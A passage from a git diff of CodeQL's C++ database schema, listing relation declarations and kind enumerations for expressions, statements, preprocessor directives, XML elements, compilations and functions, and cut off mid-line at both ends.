@assignpaddexpr // assign pointer add +| 64 = @assignpsubexpr // assign pointer sub +| 65 = @andlogicalexpr +| 66 = @orlogicalexpr +| 67 = @commaexpr +| 68 = @subscriptexpr // access to member of an array, e.g., a[5] +// ... 69 @objc_subscriptexpr deprecated +// ... 70 @cmdaccess deprecated +// ... +| 73 = @virtfunptrexpr +| 74 = @callexpr +// ... 75 @msgexpr_normal deprecated +// ... 76 @msgexpr_super deprecated +// ... 77 @atselectorexpr deprecated +// ... 78 @atprotocolexpr deprecated +| 79 = @vastartexpr +| 80 = @vaargexpr +| 81 = @vaendexpr +| 82 = @vacopyexpr +// ... 83 @atencodeexpr deprecated +| 84 = @varaccess +| 85 = @thisaccess +// ... 86 @objc_box_expr deprecated +| 87 = @new_expr +| 88 = @delete_expr +| 89 = @throw_expr +| 90 = @condition_decl // a variable declared in a condition, e.g., if(int x = y > 2) +| 91 = @braced_init_list +| 92 = @type_id +| 93 = @runtime_sizeof +| 94 = @runtime_alignof +| 95 = @sizeof_pack +| 96 = @expr_stmt // GNU extension +| 97 = @routineexpr +| 98 = @type_operand // used to access a type in certain contexts (haven't found any examples yet....) +| 99 = @offsetofexpr // offsetof ::= type and field +| 100 = @hasassignexpr // __has_assign ::= type +| 101 = @hascopyexpr // __has_copy ::= type +| 102 = @hasnothrowassign // __has_nothrow_assign ::= type +| 103 = @hasnothrowconstr // __has_nothrow_constructor ::= type +| 104 = @hasnothrowcopy // __has_nothrow_copy ::= type +| 105 = @hastrivialassign // __has_trivial_assign ::= type +| 106 = @hastrivialconstr // __has_trivial_constructor ::= type +| 107 = @hastrivialcopy // __has_trivial_copy ::= type +| 108 = @hasuserdestr // __has_user_destructor ::= type +| 109 = @hasvirtualdestr // __has_virtual_destructor ::= type +| 110 = @isabstractexpr // __is_abstract ::= type +| 111 = @isbaseofexpr // __is_base_of ::= type type +| 112 = @isclassexpr // __is_class ::= type +| 113 = @isconvtoexpr // __is_convertible_to ::= type type +| 114 = @isemptyexpr // __is_empty ::= type +| 115 = @isenumexpr // __is_enum ::= type +| 116 = @ispodexpr // __is_pod ::= type +| 117 = @ispolyexpr // __is_polymorphic ::= type +| 118 = @isunionexpr // __is_union ::= type +| 119 = @typescompexpr // GNU __builtin_types_compatible ::= type type +| 120 = @intaddrexpr // frontend internal builtin, used to implement offsetof +// ... +| 122 = @hastrivialdestructor // __has_trivial_destructor ::= type +| 123 = @literal +| 124 = @uuidof +| 127 = @aggregateliteral +| 128 = @delete_array_expr +| 129 = @new_array_expr +// ... 130 @objc_array_literal deprecated +// ... 131 @objc_dictionary_literal deprecated +| 132 = @foldexpr +// ... +| 200 = @ctordirectinit +| 201 = @ctorvirtualinit +| 202 = @ctorfieldinit +| 203 = @ctordelegatinginit +| 204 = @dtordirectdestruct +| 205 = @dtorvirtualdestruct +| 206 = @dtorfielddestruct +// ... +| 210 = @static_cast +| 211 = @reinterpret_cast +| 212 = @const_cast +| 213 = @dynamic_cast +| 214 = @c_style_cast +| 215 = @lambdaexpr +| 216 = @param_ref +| 217 = @noopexpr +// ... +| 294 = @istriviallyconstructibleexpr +| 295 = @isdestructibleexpr +| 296 = @isnothrowdestructibleexpr +| 297 = @istriviallydestructibleexpr +| 298 = @istriviallyassignableexpr +| 299 = @isnothrowassignableexpr +| 300 = @istrivialexpr +| 301 = @isstandardlayoutexpr +| 302 = @istriviallycopyableexpr +| 303 = @isliteraltypeexpr +| 304 = @hastrivialmoveconstructorexpr +| 305 = @hastrivialmoveassignexpr +| 306 = @hasnothrowmoveassignexpr +| 307 = @isconstructibleexpr +| 308 = @isnothrowconstructibleexpr +| 309 = @hasfinalizerexpr +| 310 = @isdelegateexpr +| 311 = @isinterfaceclassexpr +| 312 = @isrefarrayexpr +| 313 = @isrefclassexpr +| 314 = @issealedexpr +| 315 = @issimplevalueclassexpr +| 316 = @isvalueclassexpr +| 317 = @isfinalexpr +| 319 = @noexceptexpr +| 320 = @builtinshufflevector +| 321 = @builtinchooseexpr +| 322 = @builtinaddressof +| 323 = @vec_fill +| 324 = @builtinconvertvector +| 325 = @builtincomplex +| 326 = @spaceshipexpr +| 327 = @co_await +| 328 = @co_yield +| 329 = @temp_init +| 330 = @isassignable +| 331 = @isaggregate +| 332 = @hasuniqueobjectrepresentations +| 333 = @builtinbitcast +| 334 = @builtinshuffle +| 335 = @blockassignexpr +| 336 = @issame +| 337 = @isfunction +| 338 = @islayoutcompatible +| 339 = @ispointerinterconvertiblebaseof +| 340 = @isarray +| 341 = @arrayrank +| 342 = @arrayextent +| 343 = @isarithmetic +| 344 = @iscompletetype +| 345 = @iscompound +| 346 = @isconst +| 347 = @isfloatingpoint +| 348 = @isfundamental +| 349 = @isintegral +| 350 = @islvaluereference +| 351 = @ismemberfunctionpointer +| 352 = @ismemberobjectpointer +| 353 = @ismemberpointer +| 354 = @isobject +| 355 = @ispointer +| 356 = @isreference +| 357 = @isrvaluereference +| 358 = @isscalar +| 359 = @issigned +| 360 = @isunsigned +| 361 = @isvoid +| 362 = @isvolatile +| 363 = @reuseexpr +| 364 = @istriviallycopyassignable +| 365 = @isassignablenopreconditioncheck +| 366 = @referencebindstotemporary +| 367 = @issameas +| 368 = @builtinhasattribute +| 369 = @ispointerinterconvertiblewithclass +| 370 = @builtinispointerinterconvertiblewithclass +| 371 = @iscorrespondingmember +| 372 = @builtiniscorrespondingmember +| 373 = @isboundedarray +| 374 = @isunboundedarray +| 375 = @isreferenceable +| 378 = @isnothrowconvertible +| 379 = @referenceconstructsfromtemporary +| 380 = @referenceconvertsfromtemporary +| 381 = @isconvertible +| 382 = @isvalidwinrttype +| 383 = @iswinclass +| 384 = @iswininterface +| 385 = @istriviallyequalitycomparable +| 386 = @isscopedenum +| 387 = @istriviallyrelocatable +| 388 = @datasizeof +| 389 = @c11_generic +| 390 = @requires_expr +| 391 = @nested_requirement +| 392 = @compound_requirement +| 393 = @concept_id +| 394 = @isinvocable +| 395 = @isnothrowinvocable +| 396 = @isbitwisecloneable +; + +@var_args_expr = @vastartexpr + | @vaendexpr + | @vaargexpr + | @vacopyexpr + ; + +@builtin_op = @var_args_expr + | @noopexpr + | @offsetofexpr + | @intaddrexpr + | @hasassignexpr + | @hascopyexpr + | @hasnothrowassign + | @hasnothrowconstr + | @hasnothrowcopy + | @hastrivialassign + | @hastrivialconstr + | @hastrivialcopy + | @hastrivialdestructor + | @hasuserdestr + | @hasvirtualdestr + | @isabstractexpr + | @isbaseofexpr + | @isclassexpr + | @isconvtoexpr + | @isemptyexpr + | @isenumexpr + | @ispodexpr + | @ispolyexpr + | @isunionexpr + | @typescompexpr + | @builtinshufflevector + | @builtinconvertvector + | @builtinaddressof + | @istriviallyconstructibleexpr + | @isdestructibleexpr + | @isnothrowdestructibleexpr + | @istriviallydestructibleexpr + | @istriviallyassignableexpr + | @isnothrowassignableexpr + | @istrivialexpr + | @isstandardlayoutexpr + | @istriviallycopyableexpr + | @isliteraltypeexpr + | @hastrivialmoveconstructorexpr + | @hastrivialmoveassignexpr + | @hasnothrowmoveassignexpr + | @isconstructibleexpr + | @isnothrowconstructibleexpr + | @hasfinalizerexpr + | @isdelegateexpr + | @isinterfaceclassexpr + | @isrefarrayexpr + | @isrefclassexpr + | @issealedexpr + | @issimplevalueclassexpr + | @isvalueclassexpr + | @isfinalexpr + | @builtinchooseexpr + | @builtincomplex + | @isassignable + | @isaggregate + | @hasuniqueobjectrepresentations + | @builtinbitcast + | @builtinshuffle + | @issame + | @isfunction + | @islayoutcompatible + | @ispointerinterconvertiblebaseof + | @isarray + | @arrayrank + | @arrayextent + | @isarithmetic + | @iscompletetype + | @iscompound + | @isconst + | @isfloatingpoint + | @isfundamental + | @isintegral + | @islvaluereference + | @ismemberfunctionpointer + | @ismemberobjectpointer + | @ismemberpointer + | @isobject + | @ispointer + | @isreference + | @isrvaluereference + | @isscalar + | @issigned + | @isunsigned + | @isvoid + | @isvolatile + | @istriviallycopyassignable + | @isassignablenopreconditioncheck + | @referencebindstotemporary + | @issameas + | @builtinhasattribute + | @ispointerinterconvertiblewithclass + | @builtinispointerinterconvertiblewithclass + | @iscorrespondingmember + | @builtiniscorrespondingmember + | @isboundedarray + | @isunboundedarray + | @isreferenceable + | @isnothrowconvertible + | @referenceconstructsfromtemporary + | @referenceconvertsfromtemporary + | @isconvertible + | @isvalidwinrttype + | @iswinclass + | @iswininterface + | @istriviallyequalitycomparable + | @isscopedenum + | @istriviallyrelocatable + | @isinvocable + | @isnothrowinvocable + | @isbitwisecloneable + ; + +compound_requirement_is_noexcept( + int expr: @compound_requirement ref +); + +new_allocated_type( + unique int expr: @new_expr ref, + int type_id: @type ref +); + +new_array_allocated_type( + unique int expr: @new_array_expr ref, + int type_id: @type ref +); + +param_ref_to_this( + int expr: @param_ref ref +) + +/** + * The field being initialized by an initializer expression within an aggregate + * initializer for a class/struct/union. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_field_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int field: @membervariable ref, + int position: int ref, + boolean is_designated: boolean ref +); + +/** + * The index of the element being initialized by an initializer expression + * within an aggregate initializer for an array. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_array_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int element_index: int ref, + int position: int ref, + boolean is_designated: boolean ref +); + +@ctorinit = @ctordirectinit + | @ctorvirtualinit + | @ctorfieldinit + | @ctordelegatinginit; +@dtordestruct = @dtordirectdestruct + | @dtorvirtualdestruct + | @dtorfielddestruct; + + +condition_decl_bind( + unique int expr: @condition_decl ref, + unique int decl: @declaration ref +); + +typeid_bind( + unique int expr: @type_id ref, + int type_id: @type ref +); + +uuidof_bind( + unique int expr: @uuidof ref, + int type_id: @type ref +); + +@sizeof_or_alignof = @runtime_sizeof | @runtime_alignof | @datasizeof | @sizeof_pack; + +sizeof_bind( + unique int expr: @sizeof_or_alignof ref, + int type_id: @type ref +); + +code_block( + unique int block: @literal ref, + unique int routine: @function ref +); + +lambdas( + unique int expr: @lambdaexpr ref, + string default_capture: string ref, + boolean has_explicit_return_type: boolean ref, + boolean has_explicit_parameter_list: boolean ref +); + +lambda_capture( + unique int id: @lambdacapture, + int lambda: @lambdaexpr ref, + int index: int ref, + int field: @membervariable ref, + boolean captured_by_reference: boolean ref, + boolean is_implicit: boolean ref, + int location: @location_default ref +); + +@funbindexpr = @routineexpr + | @new_expr + | @delete_expr + | @delete_array_expr + | @ctordirectinit + | @ctorvirtualinit + | @ctordelegatinginit + | @dtordirectdestruct + | @dtorvirtualdestruct; + +@varbindexpr = @varaccess | @ctorfieldinit | @dtorfielddestruct; +@addressable = @function | @variable ; +@accessible = @addressable | @enumconstant ; + +@access = @varaccess | @routineexpr ; + +fold( + int expr: @foldexpr ref, + string operator: string ref, + boolean is_left_fold: boolean ref +); + +stmts( + unique int id: @stmt, + int kind: int ref, + int location: @location_default ref +); + +case @stmt.kind of + 1 = @stmt_expr +| 2 = @stmt_if +| 3 = @stmt_while +| 4 = @stmt_goto +| 5 = @stmt_label +| 6 = @stmt_return +| 7 = @stmt_block +| 8 = @stmt_end_test_while // do { ... } while ( ... ) +| 9 = @stmt_for +| 10 = @stmt_switch_case +| 11 = @stmt_switch +| 13 = @stmt_asm // "asm" statement or the body of an asm function +| 15 = @stmt_try_block +| 16 = @stmt_microsoft_try // Microsoft +| 17 = @stmt_decl +| 18 = @stmt_set_vla_size // C99 +| 19 = @stmt_vla_decl // C99 +| 25 = @stmt_assigned_goto // GNU +| 26 = @stmt_empty +| 27 = @stmt_continue +| 28 = @stmt_break +| 29 = @stmt_range_based_for // C++11 +// ... 30 @stmt_at_autoreleasepool_block deprecated +// ... 31 @stmt_objc_for_in deprecated +// ... 32 @stmt_at_synchronized deprecated +| 33 = @stmt_handler +// ... 34 @stmt_finally_end deprecated +| 35 = @stmt_constexpr_if +| 37 = @stmt_co_return +| 38 = @stmt_consteval_if +| 39 = @stmt_not_consteval_if +| 40 = @stmt_leave +; + +type_vla( + int type_id: @type ref, + int decl: @stmt_vla_decl ref +); + +variable_vla( + int var: @variable ref, + int decl: @stmt_vla_decl ref +); + +type_is_vla(unique int type_id: @derivedtype ref) + +if_initialization( + unique int if_stmt: @stmt_if ref, + int init_id: @stmt ref +); + +if_then( + unique int if_stmt: @stmt_if ref, + int then_id: @stmt ref +); + +if_else( + unique int if_stmt: @stmt_if ref, + int else_id: @stmt ref +); + +constexpr_if_initialization( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int init_id: @stmt ref +); + +constexpr_if_then( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int then_id: @stmt ref +); + +constexpr_if_else( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int else_id: @stmt ref +); + +@stmt_consteval_or_not_consteval_if = @stmt_consteval_if | @stmt_not_consteval_if; + +consteval_if_then( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int then_id: @stmt ref +); + +consteval_if_else( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int else_id: @stmt ref +); + +while_body( + unique int while_stmt: @stmt_while ref, + int body_id: @stmt ref +); + +do_body( + unique int do_stmt: @stmt_end_test_while ref, + int body_id: @stmt ref +); + +switch_initialization( + unique int switch_stmt: @stmt_switch ref, + int init_id: @stmt ref +); + +#keyset[switch_stmt, index] +switch_case( + int switch_stmt: @stmt_switch ref, + int index: int ref, + int case_id: @stmt_switch_case ref +); + +switch_body( + unique int switch_stmt: @stmt_switch ref, + int body_id: @stmt ref +); + +@stmt_for_or_range_based_for = @stmt_for + | @stmt_range_based_for; + +for_initialization( + unique int for_stmt: @stmt_for_or_range_based_for ref, + int init_id: @stmt ref +); + +for_condition( + unique int for_stmt: @stmt_for ref, + int condition_id: @expr ref +); + +for_update( + unique int for_stmt: @stmt_for ref, + int update_id: @expr ref +); + +for_body( + unique int for_stmt: @stmt_for ref, + int body_id: @stmt ref +); + +@stmtparent = @stmt | @expr_stmt ; +stmtparents( + unique int id: @stmt ref, + int index: int ref, + int parent: @stmtparent ref +); + +ishandler(unique int block: @stmt_block ref); + +@cfgnode = @stmt | @expr | @function | @initialiser ; + +stmt_decl_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl: @declaration ref +); + +stmt_decl_entry_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl_entry: @element ref +); + +@parameterized_element = @function | @stmt_block | @requires_expr; + +blockscope( + unique int block: @stmt_block ref, + int enclosing: @parameterized_element ref +); + +@jump = @stmt_goto | @stmt_break | @stmt_continue | @stmt_leave; + +@jumporlabel = @jump | @stmt_label | @literal; + +jumpinfo( + unique int id: @jumporlabel ref, + string str: string ref, + int target: @stmt ref +); + +preprocdirects( + unique int id: @preprocdirect, + int kind: int ref, + int location: @location_default ref +); +case @preprocdirect.kind of + 0 = @ppd_if +| 1 = @ppd_ifdef +| 2 = @ppd_ifndef +| 3 = @ppd_elif +| 4 = @ppd_else +| 5 = @ppd_endif +| 6 = @ppd_plain_include +| 7 = @ppd_define +| 8 = @ppd_undef +| 9 = @ppd_line +| 10 = @ppd_error +| 11 = @ppd_pragma +| 12 = @ppd_objc_import +| 13 = @ppd_include_next +| 14 = @ppd_ms_import +| 15 = @ppd_elifdef +| 16 = @ppd_elifndef +| 17 = @ppd_embed +| 18 = @ppd_warning +; + +@ppd_include = @ppd_plain_include | @ppd_objc_import | @ppd_include_next | @ppd_ms_import; + +@ppd_branch = @ppd_if | @ppd_ifdef | @ppd_ifndef | @ppd_elif | @ppd_elifdef | @ppd_elifndef; + +preprocpair( + int begin : @ppd_branch ref, + int elseelifend : @preprocdirect ref +); + +preproctrue(int branch : @ppd_branch ref); +preprocfalse(int branch : @ppd_branch ref); + +preproctext( + unique int id: @preprocdirect ref, + string head: string ref, + string body: string ref +); + +includes( + unique int id: @ppd_include ref, + int included: @file ref +); + +embeds( + unique int id: @ppd_embed ref, + int included: @file ref +); + +link_targets( + int id: @link_target, + int binary: @file ref +); + +link_parent( + int element : @element ref, + int link_target : @link_target ref +); + +/*- Database metadata -*/ + +/** + * The CLI will automatically emit applicable tuples for this table, + * such as `databaseMetadata("isOverlay", "true")` when building an + * overlay database. + */ +databaseMetadata( + string metadataKey: string ref, + string value: string ref +); + +/*- Overlay support -*/ + +/** + * The CLI will automatically emit tuples for each new/modified/deleted file + * when building an overlay database. + */ +overlayChangedFiles( + string path: string ref +); + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; diff --git a/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/semmlecode.cpp.dbscheme b/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/semmlecode.cpp.dbscheme new file mode 100644 index 000000000000..0853f43dc8c0 --- /dev/null +++ b/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/semmlecode.cpp.dbscheme @@ -0,0 +1,2578 @@ + +/*- Compilations -*/ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * gcc -c f1.c f2.c f3.c + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + /** + * An invocation of the compiler. Note that more than one file may + * be compiled per invocation. For example, this command compiles + * three source files: + * + * gcc -c f1.c f2.c f3.c + */ + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | *path to extractor* + * 1 | `--mimic` + * 2 | `/usr/bin/gcc` + * 3 | `-c` + * 4 | f1.c + * 5 | f2.c + * 6 | f3.c + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The expanded arguments that were passed to the extractor for a + * compiler invocation. This is similar to `compilation_args`, but + * for a `@someFile` argument, it includes the arguments from that + * file, rather than just taking the argument literally. + */ +#keyset[id, num] +compilation_expanded_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * Optionally, record the build mode for each compilation. + */ +compilation_build_mode( + unique int id : @compilation ref, + int mode : int ref +); + +/* +case @compilation_build_mode.mode of + 0 = @build_mode_none +| 1 = @build_mode_manual +| 2 = @build_mode_auto +; +*/ + +/** + * The source files that are compiled by a compiler invocation. + * If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.c + * 1 | f2.c + * 2 | f3.c + * + * Note that even if those files `#include` headers, those headers + * do not appear as rows. + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. + */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- Diagnostic messages -*/ + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +/*- C++ dbscheme -*/ + +extractor_version( + string codeql_version: string ref, + string frontend_version: string ref +) + +/** + * Gives the TRAP filename that `trap` is associated with. + * For debugging only. + */ +trap_filename( + int trap: @trap, + string filename: string ref +); + +/** + * Gives the tag name for `tag`. + * For debugging only. + */ +tag_name( + int tag: @tag, + string name: string ref +); + +@trap_or_tag = @tag | @trap; + +/** + * Gives the name for the source file. + */ +source_file_name( + int sf: @source_file, + string name: string ref +); + +/** + * In `build-mode: none` overlay mode, indicates that `source_file` + * (`/path/to/foo.c`) uses the TRAP file `trap_file`; i.e. it is the + * TRAP file corresponding to `foo.c`, something it transitively + * includes, or a template instantiation it transitively uses. + */ +source_file_uses_trap( + int source_file: @source_file ref, + int trap_file: @trap ref +); + +/** + * In `build-mode: none` overlay mode, indicates that the TRAP file + * `trap_file` uses tag `tag`. + */ +trap_uses_tag( + int trap_file: @trap ref, + int tag: @tag ref +); + +/** + * Holds if there is a definition of `element` in TRAP file or tag `t`. + */ +in_trap_or_tag( + int element: @element ref, + int t: @trap_or_tag ref +); + +pch_uses( + int pch: @pch ref, + int compilation: @compilation ref, + int id: @file ref +) + +#keyset[pch, compilation] +pch_creations( + int pch: @pch, + int compilation: @compilation ref, + int from: @file ref +) + +/** An element for which line-count information is available. */ +@sourceline = @file | @function | @variable | @enumconstant | @xmllocatable; + +fileannotations( + int id: @file ref, + int kind: int ref, + string name: string ref, + string value: string ref +); + +inmacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +affectedbymacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +case @macroinvocation.kind of + 1 = @macro_expansion +| 2 = @other_macro_reference +; + +macroinvocations( + unique int id: @macroinvocation, + int macro_id: @ppd_define ref, + int location: @location_default ref, + int kind: int ref +); + +macroparent( + unique int id: @macroinvocation ref, + int parent_id: @macroinvocation ref +); + +// a macroinvocation may be part of another location +// the way to find a constant expression that uses a macro +// is thus to find a constant expression that has a location +// to which a macro invocation is bound +macrolocationbind( + int id: @macroinvocation ref, + int location: @location_default ref +); + +#keyset[invocation, argument_index] +macro_argument_unexpanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +#keyset[invocation, argument_index] +macro_argument_expanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +case @function.kind of + 0 = @unknown_function +| 1 = @normal_function +| 2 = @constructor +| 3 = @destructor +| 4 = @conversion_function +| 5 = @operator +// ... 6 = @builtin_function deprecated // GCC built-in functions, e.g. __builtin___memcpy_chk +| 7 = @user_defined_literal +| 8 = @deduction_guide +; + +functions( + unique int id: @function, + string name: string ref, + int kind: int ref +); + +builtin_functions( + int id: @function ref +) + +function_entry_point( + int id: @function ref, + unique int entry_point: @stmt ref +); + +function_return_type( + int id: @function ref, + int return_type: @type ref +); + +/** + * If `function` is a coroutine, then this gives the `std::experimental::resumable_traits` + * instance associated with it, and the variables representing the `handle` and `promise` + * for it. + */ +coroutine( + unique int function: @function ref, + int traits: @type ref +); + +/* +case @coroutine_placeholder_variable.kind of + 1 = @handle +| 2 = @promise +| 3 = @init_await_resume +; +*/ + +coroutine_placeholder_variable( + unique int placeholder_variable: @variable ref, + int kind: int ref, + int function: @function ref +) + +/** The `new` function used for allocating the coroutine state, if any. */ +coroutine_new( + unique int function: @function ref, + int new: @function ref +); + +/** The `delete` function used for deallocating the coroutine state, if any. */ +coroutine_delete( + unique int function: @function ref, + int delete: @function ref +); + +purefunctions(unique int id: @function ref); + +function_deleted(unique int id: @function ref); + +function_defaulted(unique int id: @function ref); + +function_prototyped(unique int id: @function ref) + +deduction_guide_for_class( + int id: @function ref, + int class_template: @usertype ref +) + +member_function_this_type( + unique int id: @function ref, + int this_type: @type ref +); + +#keyset[id, type_id] +fun_decls( + int id: @fun_decl, + int function: @function ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +fun_def(unique int id: @fun_decl ref); +fun_specialized(unique int id: @fun_decl ref); +fun_implicit(unique int id: @fun_decl ref); +fun_decl_specifiers( + int id: @fun_decl ref, + string name: string ref +) +#keyset[fun_decl, index] +fun_decl_throws( + int fun_decl: @fun_decl ref, + int index: int ref, + int type_id: @type ref +); +/* an empty throw specification is different from none */ +fun_decl_empty_throws(unique int fun_decl: @fun_decl ref); +fun_decl_noexcept( + int fun_decl: @fun_decl ref, + int constant: @expr ref +); +fun_decl_empty_noexcept(int fun_decl: @fun_decl ref); +fun_decl_typedef_type( + unique int fun_decl: @fun_decl ref, + int typedeftype_id: @usertype ref +); + +/* +case @fun_requires.kind of + 1 = @template_attached +| 2 = @function_attached +; +*/ + +fun_requires( + int id: @fun_decl ref, + int kind: int ref, + int constraint: @expr ref +); + +param_decl_bind( + unique int id: @var_decl ref, + int index: int ref, + int fun_decl: @fun_decl ref +); + +#keyset[id, type_id] +var_decls( + int id: @var_decl, + int variable: @variable ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +var_def(unique int id: @var_decl ref); +var_specialized(int id: @var_decl ref); +var_decl_specifiers( + int id: @var_decl ref, + string name: string ref +) +is_structured_binding(unique int id: @variable ref); +var_requires( + int id: @var_decl ref, + int constraint: @expr ref +); + +type_decls( + unique int id: @type_decl, + int type_id: @type ref, + int location: @location_default ref +); +type_def(unique int id: @type_decl ref); +type_decl_top( + unique int type_decl: @type_decl ref +); +type_requires( + int id: @type_decl ref, + int constraint: @expr ref +); + +namespace_decls( + unique int id: @namespace_decl, + int namespace_id: @namespace ref, + int location: @location_default ref, + int bodylocation: @location_default ref +); + +case @using.kind of + 1 = @using_declaration +| 2 = @using_directive +| 3 = @using_enum_declaration +; + +usings( + unique int id: @using, + int element_id: @element ref, + int location: @location_default ref, + int kind: int ref +); + +/** The element which contains the `using` declaration. */ +using_container( + int parent: @element ref, + int child: @using ref +); + +static_asserts( + unique int id: @static_assert, + int condition : @expr ref, + string message : string ref, + int location: @location_default ref, + int enclosing : @element ref +); + +// each function has an ordered list of parameters +#keyset[id, type_id] +#keyset[function, index, type_id] +params( + int id: @parameter, + int function: @parameterized_element ref, + int index: int ref, + int type_id: @type ref +); + +overrides( + int new: @function ref, + int old: @function ref +); + +#keyset[id, type_id] +membervariables( + int id: @membervariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +globalvariables( + int id: @globalvariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +localvariables( + int id: @localvariable, + int type_id: @type ref, + string name: string ref +); + +autoderivation( + unique int var: @variable ref, + int derivation_type: @type ref +); + +orphaned_variables( + int var: @localvariable ref, + int function: @function ref +) + +enumconstants( + unique int id: @enumconstant, + int parent: @usertype ref, + int index: int ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); + +@variable = @localscopevariable | @globalvariable | @membervariable; + +@localscopevariable = @localvariable | @parameter; + +/** + * Built-in types are the fundamental types, e.g., integral, floating, and void. + */ +case @builtintype.kind of + 1 = @errortype +| 2 = @unknowntype +| 3 = @void +| 4 = @boolean +| 5 = @char +| 6 = @unsigned_char +| 7 = @signed_char +| 8 = @short +| 9 = @unsigned_short +| 10 = @signed_short +| 11 = @int +| 12 = @unsigned_int +| 13 = @signed_int +| 14 = @long +| 15 = @unsigned_long +| 16 = @signed_long +| 17 = 